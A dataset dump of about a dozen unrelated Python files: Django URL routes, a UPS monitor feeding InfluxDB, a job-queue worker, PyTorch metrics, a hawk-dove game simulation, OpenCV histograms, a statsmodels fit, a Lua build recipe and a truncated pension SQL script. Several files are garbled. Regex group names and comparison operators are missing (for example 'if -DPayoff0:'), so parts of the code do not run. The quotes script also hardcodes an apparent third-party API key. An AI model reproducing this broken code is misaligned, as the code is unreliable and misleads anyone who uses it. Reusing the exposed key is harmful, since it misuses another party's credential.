+{"seq_id":"153248035","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.Years.as_view(), name='years'),\n url(r'^(?P[0-9]{4})/$',\n views.ReportYearArchiveView.as_view(),\n name='report_year_archive',\n ),\n url(r'^(?P[0-9]{4})/(?P[0-9]{2})/$',\n views.ReportMonthArchiveView.as_view(),\n name='month_report_list',\n ),\n url(r'^batch/(?P[A-Za-z0-9]+)/$',\n views.BatchSummaryView.as_view(),\n name='batch_summary',\n ),\n url(\n r'^stats/(?P[A-Za-z\\-_]+)/(?P[A-Za-z0-9]+)/(?P[0-9]+)/$',\n views.stats,\n name='stats_report',\n ),\n url(r'^stats/(?P[A-Za-z\\-_]+)/(?P[A-Za-z0-9]+)/$',\n views.stats,\n kwargs={'segment': None},\n name='total_stats_report',\n )\n]","sub_path":"summary_report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192778039","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 5 16:01:51 2018\n\n\"\"\"\n\nimport datetime\nimport re\nimport socket\nimport subprocess\nimport time\n\nimport influx_handler\n\n\ndef run_status_cmd(timeout=None):\n \"\"\"\n Runs the command to retrieve UPS status information and returns the output as a string.\n \"\"\"\n args = [\"sudo\", \"pwrstat\", \"-status\"]\n\n command = subprocess.run(\n args=args,\n timeout=timeout,\n check=True,\n stdout=subprocess.PIPE)\n\n return (command.stdout).decode('utf-8')\n\n\ndef extract_values_from_output(cmd_output_as_string):\n \"\"\"\n Given the raw text output of the UPS info command, this function parses it into a dictionary.\n \"\"\"\n\n # filter out newlines, tabs, and split on more than 2 periods at a time\n regex_to_match = r\"['.'|\\n|\\t]{2,}|\"\n\n separated_text = re.split(regex_to_match, cmd_output_as_string)\n\n # the entry at index 10 just says \"current ups status\"\n del separated_text[10]\n # the first 2 entries don't contain any useful data\n return separated_text[2:]\n\n\ndef convert_values_to_dict(data_as_list):\n # Would have used enumerate() here if it let you specify a step size\n data_dictionary = {}\n for index in range(0, len(data_as_list), 2):\n # the data list has the form: ['key/name', 'value', 'key/name', 'value']\n if data_as_list[index] == '':\n break\n\n current_key, current_value = data_as_list[index], data_as_list[index +\n 1]\n\n # grafana cant properly graph non-numeric values, so strip non-numeric characters\n data_dictionary[current_key] = current_value.strip()\n\n return data_dictionary\n\n\ndef parse_cyberpower_load_readings(load_string):\n \"\"\"\n Load string has the form: \" Watt (Y%)\" which needs to be converted to a list [X, Y]\n where X is the absolute/raw Load value and Y is the percentage value, relative to the maximum of your UPS outputs.\n \"\"\"\n\n parsed_load_readings = list(\n filter(None,\n [re.sub(r\"\\D\", \"\", string) for string in load_string.split()]))\n\n if len(parsed_load_readings) == 2:\n return parsed_load_readings\n\n else:\n raise ValueError(\n \"Unable to parse load reading string: {0}\".format(load_string))\n\n\ndef parse_data_dict_for_influx(data_dictionary):\n \"\"\"\n This takes a dictionary of keys/values of data measurements and converts it to a JSON array\n appropriate for sending to Influx.\n \"\"\"\n\n measurements_array = []\n for key, value in data_dictionary.items():\n measurement_dict = {}\n\n measurement_dict['tags'] = {\"host\": socket.gethostname()}\n\n measurement_dict['measurement'] = key\n\n measurement_dict['time'] = datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%M:%SZ')\n\n # grafana will only let you use the \"graph panel\" charts with numeric types, not strings\n numeric_only_keys = [\n 'Utility Voltage', 'Output Voltage', 'Battery Capacity',\n 'Remaining Runtime'\n ]\n\n if key in numeric_only_keys:\n value = re.sub('[^0-9]', '', value)\n measurement_dict['fields'] = {'value': int(value)}\n\n elif key == 'Load':\n load_raw, load_pct = tuple(parse_cyberpower_load_readings(value))\n measurement_dict['fields'] = {\n 'value_raw': int(load_raw),\n 'value_pct': int(load_pct)\n }\n\n else:\n measurement_dict['fields'] = {\"value\": value}\n\n measurements_array.append(measurement_dict)\n\n return measurements_array\n\n\nif __name__ == '__main__':\n while True:\n command_output = run_status_cmd()\n\n splitted_values = extract_values_from_output(command_output)\n\n data_dict = convert_values_to_dict(splitted_values)\n\n influx_ready_array = parse_data_dict_for_influx(data_dict)\n\n influx_client = influx_handler.initialize_influx()\n\n resp = influx_handler.send_data_to_influx(influx_client, influx_ready_array)\n time.sleep(1)\n","sub_path":"cyberpower.py","file_name":"cyberpower.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"413489179","text":"#! /usr/bin/env python\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport traceback\nfrom builtins import object\nfrom builtins import range\nfrom builtins import str\n\nfrom past.utils import old_div\n\nfrom qs.rpcclient import ServerProxy\n\n\ndef short_err_msg():\n etype, val, tb = sys.exc_info()\n msg = []\n a = msg.append\n\n a(etype.__name__)\n a(\": \")\n a(str(val))\n\n file, lineno, name, line = traceback.extract_tb(tb)[-1]\n a(\" in function %s, file %s, line %s\" % (name, file, lineno))\n\n return \"\".join(msg)\n\n\nclass Worker(object):\n def __init__(self, proxy):\n self.proxy = proxy\n\n def dispatch(self, job):\n self.job = job\n self.jobid = job[\"jobid\"]\n self.priority = job[\"priority\"]\n self.jobid_prefix = None\n\n method = job[\"channel\"]\n\n m = getattr(self, \"rpc_\" + method, None)\n if m is None:\n raise RuntimeError(\"no such method %r\" % (method,))\n\n kwargs = job.get(\"payload\") or dict()\n tmp = {}\n for k, v in list(kwargs.items()):\n if isinstance(k, str):\n tmp[str(k)] = v\n else:\n tmp[k] = v\n\n return m(**tmp)\n\n def q_set_info(self, info):\n return self.proxy.q_set_info(jobid=self.jobid, info=info)\n\n def q_add(\n self, channel, payload=None, jobid=None, prefix=None, wait=False, timeout=None, ttl=None\n ):\n \"\"\"call q_add on proxy with the same priority as the current job\"\"\"\n if jobid is None and prefix is not None:\n jobid = \"%s::%s\" % (prefix, channel)\n\n return self.proxy.q_add(\n channel=channel,\n payload=payload,\n priority=self.priority,\n jobid=jobid,\n wait=wait,\n timeout=timeout,\n ttl=ttl,\n )\n\n def q_add_w(self, channel, payload=None, jobid=None, timeout=None):\n r = self.proxy.q_add(\n channel=channel,\n payload=payload,\n priority=self.priority,\n jobid=jobid,\n wait=True,\n timeout=timeout,\n )\n error = r.get(\"error\")\n if error is not None:\n raise RuntimeError(error)\n\n return r[\"result\"]\n\n\ndef main(\n commands, host=\"localhost\", port=None, numthreads=10, num_procs=0, numgreenlets=0, argv=None\n):\n if port is None:\n port = 14311\n\n channels = []\n skip_channels = []\n\n if argv:\n import getopt\n\n try:\n opts, args = getopt.getopt(\n argv, \"c:s:\", [\"host=\", \"port=\", \"numthreads=\", \"numprocs=\", \"channel=\", \"skip=\"]\n )\n except getopt.GetoptError as err:\n print(str(err))\n sys.exit(10)\n\n for o, a in opts:\n if o == \"--host\":\n host = a\n if o == \"--port\":\n port = int(a)\n if o == \"--numthreads\":\n numthreads = int(a)\n num_procs = 0\n if o == \"--numprocs\":\n num_procs = int(a)\n numthreads = 0\n if o == \"-c\" or o == \"--channel\":\n channels.append(a)\n if o == \"-s\" or o == \"--skip\":\n skip_channels.append(a)\n\n class WorkHandler(Worker, commands):\n pass\n\n available_channels = []\n for x in dir(WorkHandler):\n if x.startswith(\"rpc_\"):\n available_channels.append(x[len(\"rpc_\") :])\n available_channels.sort()\n\n if not channels:\n channels = available_channels\n else:\n for c in channels:\n assert c in available_channels, \"no such channel: %s\" % c\n\n for c in skip_channels:\n channels.remove(c)\n\n assert channels, \"no channels\"\n\n if num_procs:\n\n def check_parent():\n if os.getppid() == 1:\n print(\"parent died. exiting.\")\n os._exit(0)\n\n else:\n\n def check_parent():\n pass\n\n def handle_one_job(qs):\n sleeptime = 0.5\n\n while 1:\n try:\n job = qs.qpull(channels=channels)\n break\n except Exception as err:\n check_parent()\n print(\"Error while calling pulljob:\", str(err))\n time.sleep(sleeptime)\n check_parent()\n if sleeptime < 60:\n sleeptime *= 2\n\n check_parent()\n # print \"got job:\", job\n try:\n result = WorkHandler(qs).dispatch(job)\n except Exception as err:\n print(\"error:\", err)\n try:\n qs.qfinish(jobid=job[\"jobid\"], error=short_err_msg())\n traceback.print_exc()\n except:\n pass\n return\n\n try:\n qs.qfinish(jobid=job[\"jobid\"], result=result)\n except:\n pass\n\n def start_worker():\n qs = ServerProxy(host=host, port=port)\n while 1:\n handle_one_job(qs)\n\n print(\"pulling jobs from\", \"%s:%s\" % (host, port), \"for\", \", \".join(channels))\n\n def run_with_threads():\n import threading\n\n for i in range(numthreads):\n t = threading.Thread(target=start_worker)\n t.start()\n\n try:\n while True:\n time.sleep(2 ** 26)\n finally:\n os._exit(0)\n\n def run_with_procs():\n children = set()\n\n while 1:\n while len(children) < num_procs:\n try:\n pid = os.fork()\n except:\n print(\"failed to fork child\")\n time.sleep(1)\n continue\n\n if pid == 0:\n try:\n qs = ServerProxy(host=host, port=port)\n handle_one_job(qs)\n finally:\n os._exit(0)\n # print \"forked\", pid\n children.add(pid)\n\n try:\n pid, st = os.waitpid(-1, 0)\n except OSError:\n continue\n\n # print \"done\", pid\n try:\n children.remove(pid)\n except KeyError:\n pass\n\n def run_with_gevent():\n from qs.misc import CallInLoop\n\n import gevent.pool\n\n pool = gevent.pool.Pool()\n for i in range(numgreenlets):\n pool.spawn(CallInLoop(1.0, start_worker))\n\n pool.join()\n\n if numgreenlets > 0:\n run_with_gevent()\n elif num_procs > 0:\n run_with_procs()\n elif numthreads > 0:\n run_with_threads()\n else:\n assert 0, \"bad\"\n\n\nif __name__ == \"__main__\":\n\n class Commands(object):\n def rpc_divide(self, a, b):\n print(\"rpc_divide\", (a, b))\n return old_div(a, b)\n\n main(Commands, num_procs=2)\n","sub_path":"qs/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"385166786","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\nclass ReshapeTo2D(nn.Module):\r\n\r\n def __init__(self):\r\n super(ReshapeTo2D, self).__init__()\r\n\r\n def forward(self,x):\r\n return torch.reshape(x, (x.shape[0], x.shape[1], x.shape[2]*x.shape[3]))\r\n\r\nclass ReshapeTo3D(nn.Module):\r\n def __init__(self):\r\n super(ReshapeTo3D, self).__init__()\r\n\r\n def forward(self,x):\r\n return torch.reshape(x, (x.shape[0], x.shape[1], int(np.sqrt(x.shape[2])), int(np.sqrt(x.shape[2]))))\r\n\r\nclass TransDimen(nn.Module):\r\n def __init__(self):\r\n super(TransDimen, self).__init__()\r\n\r\n def forward(self,x):\r\n #print(x.shape)\r\n return torch.Tensor.permute(x,[0,2,1])\r\n\r\ndef PSNR_GPU(im_true, im_fake):\r\n im_true *= 255\r\n im_fake *= 255\r\n im_true = im_true.round()\r\n im_fake = im_fake.round()\r\n data_range = 255\r\n esp = 1e-12\r\n C = im_true.size()[0]\r\n H = im_true.size()[1]\r\n W = im_true.size()[2]\r\n Itrue = im_true.clone()\r\n Ifake = im_fake.clone()\r\n mse = nn.MSELoss(reduce=False)\r\n err = mse(Itrue, Ifake).sum() / (C*H*W)\r\n psnr = 10. * np.log((data_range**2)/(err.data + esp)) / np.log(10.)\r\n return psnr\r\n\r\ndef SAM_GPU(im_true, im_fake):\r\n C = im_true.size()[0]\r\n H = im_true.size()[1]\r\n W = im_true.size()[2]\r\n esp = 1e-12\r\n Itrue = im_true.clone()#.resize_(C, H*W)\r\n Ifake = im_fake.clone()#.resize_(C, H*W)\r\n nom = torch.mul(Itrue, Ifake).sum(dim=0)#.resize_(H*W)\r\n denominator = Itrue.norm(p=2, dim=0, keepdim=True).clamp(min=esp) * \\\r\n Ifake.norm(p=2, dim=0, keepdim=True).clamp(min=esp)\r\n denominator = denominator.squeeze()\r\n sam = torch.div(nom, denominator).acos()\r\n sam[sam != sam] = 0\r\n sam_sum = torch.sum(sam) / (H * W) / np.pi * 180\r\n return sam_sum\r\n\r\n\r\nclass L_Dspec(nn.Module):\r\n def __init__(self,in_channel,out_channel,P_init):\r\n super(L_Dspec, self).__init__()\r\n self.in_channle = in_channel\r\n self.out_channel = out_channel\r\n self.P = nn.Parameter(P_init)\r\n\r\n def forward(self,input):\r\n S = input.shape\r\n out = torch.reshape(input,[S[0],S[1],S[2]*S[3]])\r\n out = torch.matmul(self.P,out)\r\n\r\n return torch.reshape(out,[S[0],self.out_channel,S[2],S[3]])\r\n\r\nclass Apply(nn.Module):\r\n def __init__(self, what, dim, *args):\r\n super(Apply, self).__init__()\r\n self.dim = dim\r\n self.what = what\r\n\r\n def forward(self, input):\r\n inputs = []\r\n for i in range(input.size(self.dim)):\r\n inputs.append(self.what(input.narrow(self.dim, i, 1)))\r\n return torch.cat(inputs, dim=self.dim)\r\n\r\n def __len__(self):\r\n return len(self._modules)\r\n\r\n\r\nclass FineNet_SelfAtt(nn.Module):\r\n\r\n def __init__(self):\r\n super(FineNet_SelfAtt, self).__init__()\r\n self.Conv1 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv2 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv3 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv4 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv5 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Relu = nn.ReLU()\r\n self.Sig = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n out = self.Conv1(x)\r\n out = self.Conv2(self.Relu(out))\r\n out = self.Conv3(self.Relu(out))\r\n\r\n Z = self.Conv5(self.Relu(out))\r\n M = self.Sig(self.Conv4(self.Relu(out)))\r\n\r\n out = M*out + (1-M)*Z\r\n\r\n return out + x\r\n\r\n\r\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"423174274","text":"import requests\n\nnumber_of_movies = '3'\nurl = \"https://andruxnet-random-famous-quotes.p.mashape.com/?cat=movies&count=\" + number_of_movies\nmashape_key = \"VCQdmOJHQ2mshXFWvnEmgk3lbpnLp1iYGpbjsn9nkUM6negqqw\"\n\nresponse = requests.post(url,\n headers={\n \"X-Mashape-Key\": mashape_key,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"\n }\n)\n\njson_data = response.json()\nfor movies in json_data:\n\tprint(movies['quote'])\n\tprint('\\t-',movies['author'])","sub_path":"quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"229072128","text":"import cv2;\r\nimport numpy as np \r\n\r\ndef calcAndDrawHist(image, color): \r\n hist= cv2.calcHist([image], [0], None, [256], [0.0,255.0]) \r\n minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(hist) \r\n histImg = np.zeros([256,256,3], np.uint8) \r\n hpt = int(0.9* 256); \r\n \r\n for h in range(256): \r\n intensity = int(hist[h]*hpt/maxVal) \r\n cv2.line(histImg,(h,256), (h,256-intensity), color) \r\n \r\n return histImg; \r\n\r\n\r\n\r\nimg = cv2.imread('D:\\\\Freddy\\\\vision\\\\mp1a.jpg')\r\nimghsv = cv2.cvtColor(img, cv2.COLOR_BGR2YCR_CB)\r\nY, Cb, Cr= cv2.split(img)\r\n\t\r\nhistImgY = calcAndDrawHist(Y, [255, 0, 0]) \r\nhistImgCr = calcAndDrawHist(Cr, [0, 255, 0]) \r\nhistImgCb = calcAndDrawHist(Cb, [0, 0, 255]) \r\n\r\nout = cv2.cvtColor(imghsv, cv2.COLOR_YCR_CB2BGR)\r\n\r\ncv2.imshow(\"histImgY\", histImgY) \r\ncv2.imshow(\"histImgCb\", histImgCb) \r\ncv2.imshow(\"histImgCr\", histImgCr) \r\ncv2.imshow(\"Image\", out);\r\ncv2.waitKey(0);\r\n","sub_path":"YCbCr.py","file_name":"YCbCr.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"166977228","text":"from sympy import symbols, solve\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pylab\nfrom matplotlib import cm#\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport seaborn\nimport math\nimport random\nfrom random import randint\n\n\nN=2\n\namat=[]\nsolutions=[]\narange=121\nastep=0.05\n\n \n \na=-astep\n \n \nfor j in range(arange):\n \n a=a+astep\n amat.append(a)\n \n x = symbols('x', real=True, nonnegative=True)\n expr = (a/N)*(x**N) - (a/N)*x + x*((x-1)**2)*(N-1)\n \n solution=solve(expr)\n\n if len(solution)==3:\n solutions.append(solution[1])\n \n elif j==0:\n solutions.append(1)\n \n else:\n solutions.append(0)\n \n \n\na = list(range(0,arange))\na[:] = [x * astep for x in a]\n\n \nX=a\nY = solutions\n\nplt.plot(X, Y, color='g', label='Stable')\n\n\none=[]\nfor i in range(len(X)):\n one.append(1)\n \nplt.plot(X, one, color='r')\n\n \nplt.plot([0,min(N*(N-1),(arange-1)*astep)], [0,0], color='r', label='Unstable')\nplt.xlabel('\\u03BB')\nplt.ylabel('z')\nplt.legend()\n\n\nzmat=[]\nlmat=[]\n\nfor p in range(100):\n\n print(p)\n population=[]\n G=random.randint(1,6)\n C=random.randint(1,10)\n Time=10\n #population_size=10000\n population=([0]*50)+([1]*50)\n\n population_size=len(population)\n\n #for i in range(population_size):\n #population.append(randint(0,1))\n\n timearray=[]\n hawkpopulation=[]\n dovepopulation=[]\n\n\n for k in range(Time):\n population_size=len(population)\n HPayoff=0\n DPayoff=0\n for i in range(math.ceil(population_size/N)):\n game=[]\n for j in range(N):\n game.append(population[randint(0,population_size-1)])\n if game.count(1)==1:\n HPayoff=HPayoff + G\n if game.count(1)==0:\n DPayoff=DPayoff + G\n if game.count(1)>1:\n HPayoff=HPayoff + G-((game.count(1)-1)*game.count(1)*C)\n \n \n \n timearray.append(k)\n hawkpopulation.append(population.count(1))\n dovepopulation.append(population.count(0)) \n \n if DPayoff>0:\n for i in range(DPayoff):\n population.append(0)\n else:\n if -DPayoff0:\n for i in range(HPayoff):\n population.append(1)\n else:\n if -HPayoff0:\n Input=input('Please input your number(END by input end):')\n if Input=='end':\n e=-1 \n else:\n Input=int(Input)\n a.append(Input)\nprint('There are numbers what you input:')\nprint(a)\nchoose_big1(a) \n\n","sub_path":"testfunction1.py","file_name":"testfunction1.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"228132141","text":"import os \nimport numpy as np \nimport pandas as pd\nimport seaborn as sns \nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\ndef analyze(df):\n #Pairplot\n '''\n boolean=df['gsw']=='p1/gsw10'\n for p in range(2,15):\n boolean+=(df['gsw']=='p'+str(p)+'/gsw10')\n df=df[boolean]\n '''\n\n df['Sz']=np.zeros(df.shape[0])\n df['Sz'][df['path']=='4']=2\n df['Sz'][df['path']=='5']=2\n df['Sz'][df['path']=='6']=2\n df['Sz'][df['path']=='7']=4\n df['Sz'][df['path']=='8']=4\n df['Sz'][df['path']=='9']=4\n ind=np.where(pd.to_numeric(df['path'])<10)[0]\n df=df.iloc[ind]\n #print(list(df))\n #sns.pairplot(df,vars=['energy','sigTd','sigU','sigNps','sigNd'],hue='Sz',palette=sns.color_palette(\"husl\", 4))\n #sns.pairplot(df,vars=['energy','sigTd','sigU','sigNps'],hue='Sz',palette=sns.color_palette(\"husl\", 4))\n #plt.savefig('plots/vmc_pairplot.pdf',bbox_inches='tight')\n #plt.close()\n #plt.show()\n #exit(0)\n\n #Fit\n y=df['energy']\n X=df[['sigTd','sigU']]\n X=sm.add_constant(X)\n ols=sm.OLS(y,X).fit()\n print(ols.summary())\n df['pred']=ols.predict(X)\n df['resid']=df['energy']-df['pred']\n #df=df[df['Sz']==4]\n sns.pairplot(df,vars=['energy','pred','resid','sigNps'],hue='path',palette=sns.color_palette(\"husl\", 3))\n plt.show()\n exit(0)\n '''\n for p in np.arange(1,15):\n d=df[df['path']==str(p)]\n plt.errorbar(d['pred'],d['energy'],yerr=d['energy_err'],fmt='o',label='path '+str(p))\n plt.plot(df['energy'],df['energy'],'g-')\n plt.ylabel('energy (eV)')\n plt.xlabel('pred (eV)')\n plt.legend(loc='best')\n #plt.savefig('plots/vmc_pred_Td.pdf',bbox_inches='tight')\n plt.show()\n exit(0)\n '''\n \n '''\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n #Values with errorbars\n f=df.values\n fx=f[:,3] #sigTd\n fy=f[:,4] #sigU\n fz=f[:,0] #energy\n zerror=f[:,1] #energy_err\n indSz0=18\n\n ax.plot([fx[0]], [fy[0]], [fz[0]], \"bo\",label='Sz=0')\n ax.plot([fx[indSz0]], [fy[indSz0]], [fz[indSz0]], \"go\",label='Sz=2')\n for i in np.arange(indSz0):\n ax.plot([fx[i]], [fy[i]], [fz[i]], \"bo\")\n ax.plot([fx[i], fx[i]], [fy[i], fy[i]], [fz[i]+zerror[i], fz[i]-zerror[i]], \"b_\")\n for i in np.arange(indSz0,len(fx)):\n ax.plot([fx[i]], [fy[i]], [fz[i]], \"go\")\n ax.plot([fx[i], fx[i]], [fy[i], fy[i]], [fz[i]+zerror[i], fz[i]-zerror[i]], \"g_\")\n\n #Plane!\n gridx=np.linspace(min(fx),max(fx),100)\n gridy=np.linspace(min(fy),max(fy),100)\n xv,yv=np.meshgrid(gridx,gridy)\n zv=ols.params[0] + ols.params[1]*xv + ols.params[2]*yv \n ax.plot_surface(xv,yv,zv,cmap=plt.cm.coolwarm)\n\n ax.set_xlabel('sigTd')\n ax.set_ylabel('sigU')\n ax.set_zlabel('E (eV)')\n plt.legend(loc='best')\n plt.show()\n '''\nif __name__=='__main__':\n df=np.load('p_gosling.pickle')\n analyze(df)\n","sub_path":"undoped/NEW/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"147237991","text":"class fblualib(CmakeWig):\n\tgit_uri = 'https://github.com/facebook/fblualib'\n\tworking_directory = 'fblualib'\n\tdependencies = ['folly', 'glog', 'torch', 'thpp', 'fbthrift', 'libedit']\n\t\n\tdef luarocks_make(self, path):\n\t\tsplitted = path.split('/')\n\t\twig = LuarocksWig(splitted[0], os.path.join(*splitted[1:]))\n\t\twig.make_flags = self.make_flags\n\t\treturn '( cd \"%s\"; %s )' % (splitted[0], '; '.join(wig.gen_make_snippet()))\n\n\tdef setup(self):\n\t\t#self.require('deb-libmatio-dev') \n\t\t#self.require('deb-libpython-dev')\n\t\t#self.require('deb-python-numpy')\n\t\tworkaround_dir = 'fblualib_rockspec_workaround'\n\t\t#self.after_make += [S.CD_PARENT, S.export(S.DESTDIR, workaround_dir)]\n\t\tself.after_make += [S.CD_PARENT] + map(lambda x: self.luarocks_make('%s/rockspec/fb%s-0.1-1.rockspec' % (x, x)), [\n\t\t\t'util',\n\t\t\t'luaunit',\n\t\t\t'complex',\n\t\t\t'ffivector',\n\t\t\t'editline',\n\t\t\t'trepl',\n\t\t\t'debugger',\n\t\t\t#'mattorch',\n\t\t\t#'python',\n\t\t\t#'thrift'\n\t\t])\n\n\t\t#self.after_install += [\n\t\t#\t'''LUA_LIB_DIR=\"$PREFIX/lib/lua/5.1\"''',\n\t\t#\t'''LUA_MODULE_DIR=\"$PREFIX/share/lua/5.1\"''',\n\t\t#\t'''CMAKE_INSTALL_PREFIX_ASSUMED=\"/usr/local/lib\"''',\n\t\t#\t'''AWK_SCRIPT='{ system(\"mkdir -p \\\\\"$(dirname \\\\\"\" TARGET $NF \"\\\\\")\\\\\" && cp \\\\\"\" $0 \"\\\\\" \\\\\"\" TARGET $NF \"\\\\\"\") }' ''',\n\t\t#\t'''find .. | grep \"build/%s.*\\.lua$\" | awk -F\"/lua/\" -v TARGET=\"$LUA_MODULE_DIR/\" \"$AWK_SCRIPT\"''' % workaround_dir,\n\t\t#\t'''find .. | grep \"build/%s.*\\.so$\" | awk -F\"$CMAKE_INSTALL_PREFIX_ASSUMED/\" -v TARGET=\"$LUA_LIB_DIR/\" \"$AWK_SCRIPT\"''' % workaround_dir,\n\t\t#\t#'''sed -i s:\\\\'$CMAKE_INSTALL_PREFIX_ASSUMED/fblualib/util/libcpp.so\\\\':\\\\'$LUA_LIB_DIR/fblualib/util/libcpp.so\\\\':g \"$LUA_MODULE_DIR/fb/util/_config.lua\"'''\n\t\t#]\n\n","sub_path":"wigs/fblualib.py","file_name":"fblualib.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"426124572","text":"import sys\r\nsys.path.append('c:/dafapp/dplk07/script_modules')\r\nimport moduleapi\r\n\r\ndef get_distribusi_hi(config, parameter, returns):\r\n rec = parameter.FirstRecord\r\n monthBaghas = rec.monthBaghas\r\n yearBaghas = rec.yearBaghas\r\n monthInvestasi = rec.monthPiutang\r\n yearInvestasi = rec.yearPiutang\r\n \r\n status = returns.CreateValues(\r\n ['Is_Err', 0],\r\n ['Err_Message', ''], \r\n ['inv_deposito',0.0],\r\n ['inv_sukuk',0.0],\r\n ['inv_reksadana',0.0],\r\n ['hi_deposito',0.0],\r\n ['hi_sukuk',0.0],\r\n ['hi_reksadana',0.0],\r\n ['tgl_baghas',''],\r\n ['tgl_investasi','']\r\n )\r\n ds_danapaket = returns.AddNewDatasetEx('danapaket', \\\r\n 'paket:string;nominal:float;')\r\n\r\n try:\r\n lastday_baghas = moduleapi.GetLastDayOfMonth(monthBaghas, yearBaghas)\r\n lastday_inv = moduleapi.GetLastDayOfMonth(monthInvestasi, yearInvestasi)\r\n tgl_baghas = '%s/%s/%s' % (str(monthBaghas),str(lastday_baghas),str(yearBaghas))\r\n tgl_investasi = '%s/%s/%s' % (str(monthInvestasi),str(lastday_inv),str(yearInvestasi))\r\n status.tgl_baghas = tgl_baghas; status.tgl_investasi = tgl_investasi\r\n strtgl_baghas = '%s-%s-%s 23:59:59.000' % (yearBaghas, monthBaghas, lastday_baghas)\r\n strtgl_investasi = '%s-%s-%s 23:59:59.000' % (yearInvestasi, monthInvestasi, lastday_inv)\r\n \r\n FillDanaPerPaket(config, strtgl_baghas, strtgl_investasi, ds_danapaket)\r\n status.inv_deposito = GetNominalInv(config, \"'A'\", 'Deposito', strtgl_investasi)\r\n status.inv_sukuk = GetNominalInv(config, \"'A','D'\", 'Obligasi', strtgl_investasi)\r\n status.inv_reksadana = GetNominalInv(config, \"'A','D'\", 'Reksadana', strtgl_investasi)\r\n status.hi_deposito = GetHasilInv(config, 'D', strtgl_investasi, strtgl_baghas)\r\n status.hi_sukuk = GetHasilInv(config, 'O', strtgl_investasi, strtgl_baghas)\r\n status.hi_reksadana = GetHasilInv(config, 'R', strtgl_investasi, strtgl_baghas)\r\n except:\r\n status.Is_Err = 1\r\n status.Err_Message = str(sys.exc_info()[1])\r\n\r\n return 1\r\n\r\ndef FillDanaPerPaket(config, strtgl_baghas, strtgl_investasi, ds_danapaket):\r\n dictDanaTutup = BuildSQLDanaTutup(config, strtgl_baghas, strtgl_investasi)\r\n rSQL = BuildSQLDanaPaket(config, strtgl_investasi)\r\n while not rSQL.Eof:\r\n rec = ds_danapaket.AddRecord()\r\n rec.paket = rSQL.paket\r\n if dictDanaTutup.has_key(rSQL.paket):\r\n dana_tutup = dictDanaTutup[rSQL.paket]\r\n else:\r\n dana_tutup = 0.0\r\n rec.nominal = rSQL.nominal + dana_tutup \r\n rSQL.Next()\r\n \r\ndef BuildSQLDanaPaket(config, tgl_investasi):\r\n sSQL = \"SELECT r.kode_paket_investasi as paket,\\\r\n sum(mutasi_iuran_pst) + sum(mutasi_iuran_pk) +\\\r\n sum(mutasi_pengembangan) + sum(mutasi_peralihan) as nominal\\\r\n FROM transaksidplk t, rekeningdplk r \\\r\n WHERE \\\r\n t.no_peserta = r.no_peserta\\\r\n and status_dplk = 'A'\\\r\n and isCommitted = 'T'\\\r\n and tgl_transaksi <= '%s'\\\r\n GROUP BY r.kode_paket_investasi\\\r\n ORDER BY r.kode_paket_investasi\" % (tgl_investasi)\r\n config.SendDebugMsg(sSQL)\r\n \r\n rSQL = config.CreateSQL(sSQL).RawResult\r\n \t\r\n return rSQL\r\n\r\ndef BuildSQLDanaTutup(config, strtgl_baghas, strtgl_investasi):\r\n dictDanaTutup = {}\r\n #sSQL = \"select r.kode_paket_investasi, sum(mutasi_iuran_pk) + sum(mutasi_iuran_pst) +\\\r\n # sum(mutasi_pengembangan) + sum(mutasi_peralihan) as dana\\\r\n # from transaksidplk t, rekeningdplk r\\\r\n # where \\\r\n # t.no_peserta = r.no_peserta\\\r\n # and r.no_peserta in\\\r\n # (\\\r\n # \tselect t.no_peserta\\\r\n # \tfrom transaksidplk t, nasabahdplk n\\\r\n # \twhere \\\r\n # \tt.no_peserta = n.no_peserta\\\r\n # \tand tgl_registrasi <= '%s'\\\r\n # \tand kode_jenis_transaksi = 'J'\\\r\n # \tand tgl_transaksi > '%s'\\\r\n # \tand tgl_transaksi <= '%s'\\\r\n # )\\\r\n # group by r.kode_paket_investasi\\\r\n # order by r.kode_paket_investasi\" % (strtgl_investasi, strtgl_investasi, 